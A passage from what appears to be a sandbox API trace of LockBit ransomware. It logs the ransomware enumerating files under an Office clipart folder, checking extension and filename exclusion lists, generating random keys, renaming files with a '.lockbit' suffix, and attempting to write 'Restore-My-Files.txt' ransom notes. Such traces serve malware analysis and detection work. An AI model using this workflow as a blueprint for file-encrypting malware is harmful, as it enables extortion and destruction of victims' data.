lpString2="BL00273_.WMF") returned 1 [0108.571] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00273_.WMF") returned 1 [0108.571] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00273_.WMF") returned -1 [0108.571] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00273_.WMF") returned 1 [0108.571] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00273_.WMF") returned 1 [0108.572] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.572] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned=".WMF" [0108.572] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.572] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.572] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.572] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.lockbit") returned 72 [0108.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.573] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.573] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.573] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3780) returned 1 [0108.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.574] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.574] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0108.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.581] malloc (_Size=0xa6) returned 0x77d800 [0108.581] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0108.581] free (_Block=0x77d800) [0108.581] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.581] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.581] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.581] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e80900, ftCreationTime.dwHighDateTime=0x1bd4b17, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc9e80900, ftLastWriteTime.dwHighDateTime=0x1bd4b17, nFileSizeHigh=0x0, nFileSizeLow=0x1044, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00274_.WMF", cAlternateFileName="")) returned 1 [0108.581] lstrcmpiW (lpString1=".", lpString2="BL00274_.WMF") returned -1 [0108.582] lstrcmpiW (lpString1="..", lpString2="BL00274_.WMF") returned -1 [0108.582] PathFindExtensionW (pszPath="BL00274_.WMF") returned=".WMF" [0108.582] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.582] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.583] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.583] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00274_.WMF") returned 1 [0108.584] lstrcmpiW (lpString1="ntldr", lpString2="BL00274_.WMF") returned 1 [0108.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00274_.WMF") returned 1 [0108.584] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00274_.WMF") returned 1 [0108.584] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00274_.WMF") returned -1 [0108.584] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00274_.WMF") returned 1 [0108.584] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00274_.WMF") returned 1 [0108.584] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.584] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned=".WMF" [0108.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.584] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.584] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.585] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.585] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.lockbit") returned 72 [0108.585] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.585] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.585] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.586] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4164) returned 1 [0108.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.586] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.591] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.591] malloc (_Size=0xa6) returned 0x77d800 [0108.591] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0108.594] free (_Block=0x77d800) [0108.594] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.594] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.594] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.594] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac309900, ftCreationTime.dwHighDateTime=0x1bd4b43, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xac309900, ftLastWriteTime.dwHighDateTime=0x1bd4b43, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00296_.WMF", cAlternateFileName="")) returned 1 [0108.594] lstrcmpiW (lpString1=".", lpString2="BL00296_.WMF") returned -1 [0108.594] lstrcmpiW (lpString1="..", lpString2="BL00296_.WMF") returned -1 [0108.594] PathFindExtensionW (pszPath="BL00296_.WMF") returned=".WMF" [0108.594] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.594] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.595] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.595] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00296_.WMF") returned 1 [0108.596] lstrcmpiW (lpString1="ntldr", lpString2="BL00296_.WMF") returned 1 [0108.596] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00296_.WMF") returned 1 [0108.596] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00296_.WMF") returned 1 [0108.596] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00296_.WMF") returned -1 [0108.596] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00296_.WMF") returned 1 [0108.596] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00296_.WMF") returned 1 [0108.596] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.596] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned=".WMF" [0108.596] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.596] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.596] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.597] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.597] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.lockbit") returned 72 [0108.597] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.598] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.598] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.598] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=812) returned 1 [0108.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.600] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.114] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.114] malloc (_Size=0xa6) returned 0x77d800 [0109.114] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.114] free (_Block=0x77d800) [0109.114] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.114] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.115] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.115] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf533800, ftCreationTime.dwHighDateTime=0x1bd4b03, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdf533800, 